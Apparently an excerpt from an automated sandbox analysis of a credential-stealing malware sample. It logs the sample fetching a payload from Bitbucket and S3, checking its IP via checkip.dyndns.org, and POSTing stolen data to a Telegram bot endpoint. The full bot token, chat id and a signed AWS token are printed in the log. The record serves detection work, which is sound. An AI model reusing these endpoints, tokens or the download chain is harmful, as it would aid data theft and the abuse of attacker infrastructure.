              Source: global trafficHTTP traffic detected: GET /e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c09f-4309-a330-311e812ab273/202_Cneehezxuzj?response-content-disposition=attachment%3B%20filename%3D%22202_Cneehezxuzj%22&AWSAccessKeyId=ASIA6KOSE3BNHUQUF4A6&Signature=cFww4wpmqtopKHlnmXlm4GVTpQg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJj%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIEndov2P1y0Z9e0DlTVxAv6A14kmp9GBJjmAh%2FjmTMFwAiBjG2TfGOxIkvMGRVFDckh%2BAASexPpbLyJKYHMryKxSriqnAghhEAAaDDk4NDUyNTEwMTE0NiIMf%2Bh2cKia5Yx4TuvBKoQCEEzKKpluFmsQkjGCbSPYf%2BLJiFaVkBou%2B66q5kuWxCylJUxBLQOH3EPVfOOqBUsjv%2BplzMxEMKiVkX7udPXu7zIKdXWWG%2B%2BprQZWvy0TX23XQIYbgpnfJojx0RHba%2BldodnwwKFHrr3lIgLVesPQYtw%2BCu6ZsSzrD29UkfkzW8%2F1hoA2B9KHRvxC9iLESNK%2BeIGKhxzVjTXsaxwf%2BSOHufmSV7YsLhCS9yy56Xi7gDSRpgaqGyuCq1RWZTJumEq3IbG6r4YeWb%2BAI6F5GCPynlAkfItG6ShyZ1YbOdESvbkj%2Bg51ynTw5XoOaU%2Fbe4vVdWpFvhgzAs6zpE%2FVGK3eqCo%2FMJ4w6dSLuwY6ngEhZlKNLEhMPrSpaSiwOVqR5QNGIQ%2Fe2ipvll7jjw67tvUewMuEkhMTDcvqFrlpslPfjG4qG81rcgIZEGMXYjC0fmyX7PQssGw0Vl9DOmiTKooxU4XM8Nsbc08SmOisr1aKKCWOStpDcrXcuLWl%2FynXNzUVR7RppUbIoeRML505tHM5flInq%2FVElsON8KVn%2BAM4ApVp3auvaOjnmPP3sQ%3D%3D&Expires=1734537585 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /ntim1478/gpmaw/downloads/202_Cneehezxuzj HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
              Source: global trafficHTTP traffic detected: GET /e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c09f-4309-a330-311e812ab273/202_Cneehezxuzj?response-content-disposition=attachment%3B%20filename%3D%22202_Cneehezxuzj%22&AWSAccessKeyId=ASIA6KOSE3BNHUQUF4A6&Signature=cFww4wpmqtopKHlnmXlm4GVTpQg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJj%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIEndov2P1y0Z9e0DlTVxAv6A14kmp9GBJjmAh%2FjmTMFwAiBjG2TfGOxIkvMGRVFDckh%2BAASexPpbLyJKYHMryKxSriqnAghhEAAaDDk4NDUyNTEwMTE0NiIMf%2Bh2cKia5Yx4TuvBKoQCEEzKKpluFmsQkjGCbSPYf%2BLJiFaVkBou%2B66q5kuWxCylJUxBLQOH3EPVfOOqBUsjv%2BplzMxEMKiVkX7udPXu7zIKdXWWG%2B%2BprQZWvy0TX23XQIYbgpnfJojx0RHba%2BldodnwwKFHrr3lIgLVesPQYtw%2BCu6ZsSzrD29UkfkzW8%2F1hoA2B9KHRvxC9iLESNK%2BeIGKhxzVjTXsaxwf%2BSOHufmSV7YsLhCS9yy56Xi7gDSRpgaqGyuCq1RWZTJumEq3IbG6r4YeWb%2BAI6F5GCPynlAkfItG6ShyZ1YbOdESvbkj%2Bg51ynTw5XoOaU%2Fbe4vVdWpFvhgzAs6zpE%2FVGK3eqCo%2FMJ4w6dSLuwY6ngEhZlKNLEhMPrSpaSiwOVqR5QNGIQ%2Fe2ipvll7jjw67tvUewMuEkhMTDcvqFrlpslPfjG4qG81rcgIZEGMXYjC0fmyX7PQssGw0Vl9DOmiTKooxU4XM8Nsbc08SmOisr1aKKCWOStpDcrXcuLWl%2FynXNzUVR7RppUbIoeRML505tHM5flInq%2FVElsON8KVn%2BAM4ApVp3auvaOjnmPP3sQ%3D%3D&Expires=1734537585 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: bitbucket.org
              Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f4f091cadcaHost: api.telegram.orgContent-Length: 535Connection: Keep-Alive
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B8E8000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B62B000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B7A4000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032ED4000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032AEA000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032B04000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032A4D000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032B61000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032D67000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.00000000229BE000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022AB8000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.00000000229B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.00000000229B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgh
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/h
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/p
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: spoolsv.COM, 0000000A.00000002.1613318386.0000000021A10000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1580963085.000000007F11A000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612795563.000000002193C000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, xzeheenC.pif.10.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: kn.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: kn.exe, 00000007.00000000.1471597989.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1483116865.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1485238233.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1489880503.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: spoolsv.COM, 0000000A.00000002.1613318386.0000000021A10000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1580963085.000000007F11A000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612795563.000000002193C000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, xzeheenC.pif.10.drString found in binary or memory: http://ocsp.comodoca.com0$
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: spoolsv.COM, 0000000A.00000002.1613318386.0000000021A10000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1580963085.000000007F11A000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612795563.000000002193C000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, xzeheenC.pif.10.drString found in binary or memory: http://www.pmail.com0
              Source: kn.exeString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
              Source: kn.exe, 00000007.00000000.1471597989.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1483116865.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1485238233.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1489880503.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
